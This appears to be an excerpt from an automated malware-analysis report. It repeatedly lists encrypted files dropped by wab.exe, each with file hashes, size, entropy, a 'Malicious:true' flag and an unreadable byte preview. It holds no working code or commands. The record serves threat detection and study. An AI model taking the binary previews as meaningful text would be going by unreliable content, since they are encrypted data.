                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166429
                                                                                Entropy (8bit):7.999058378855256
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5AjG+4AOpjvHsb3Ce04YnaclZe3IUTscF8Eu8BBWU9THhjq3BgyT:ZIc0afzkHLbCe0PO3IUTDLu8RTHhjfyT
                                                                                MD5:DFC85637899F78B5BC91FE846D62D7D4
                                                                                SHA1:AD46F254AF4200A039C9AA4D3576CA307B6754D3
                                                                                SHA-256:C41D44A43BA3AA2A5D913D63311146774414818AA379FBEF6D9F4B9D87F3D10F
                                                                                SHA-512:BE7858C07B454BF1D21B08C025613A8E6ECEA7EF950B98388B6EDF1059C18E85ACB4E76F615A8C981ADB5D54D69EE9E35B96FF601E13E6B9BB017C0089DE7282
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166436
                                                                                Entropy (8bit):7.998770977590755
                                                                                Encrypted:true
                                                                                SSDEEP:3072:+DV4yCWTTSc/a+vwTOTOqqXDLBZyL/kc4d+L39ZUlTXQfp+YTyDDnqPjFo:+5DzTTSc/a+yLDtZ/cu23/670yOPj2
                                                                                MD5:E4A9DA4E92D0F71516EF8590084633F8
                                                                                SHA1:085DE46E188B712601A0742AE4B5D070816F00A8
                                                                                SHA-256:786EAE401B6151778C69722E7C6A8E7DD8F0484904569DE65AEBAD86ABA2BFAE
                                                                                SHA-512:43182C417EC5BEDD3718D71CD655584DA404FD3DD1828BF996A8BC785EC21DAE3681983315F7B9F49E7D8E474D69DCAEFA977CED500A4BEFD9D7CFDA713A3ABC
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166436
                                                                                Entropy (8bit):7.998770977590755
                                                                                Encrypted:true
                                                                                SSDEEP:3072:+DV4yCWTTSc/a+vwTOTOqqXDLBZyL/kc4d+L39ZUlTXQfp+YTyDDnqPjFo:+5DzTTSc/a+yLDtZ/cu23/670yOPj2
                                                                                MD5:E4A9DA4E92D0F71516EF8590084633F8
                                                                                SHA1:085DE46E188B712601A0742AE4B5D070816F00A8
                                                                                SHA-256:786EAE401B6151778C69722E7C6A8E7DD8F0484904569DE65AEBAD86ABA2BFAE
                                                                                SHA-512:43182C417EC5BEDD3718D71CD655584DA404FD3DD1828BF996A8BC785EC21DAE3681983315F7B9F49E7D8E474D69DCAEFA977CED500A4BEFD9D7CFDA713A3ABC
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
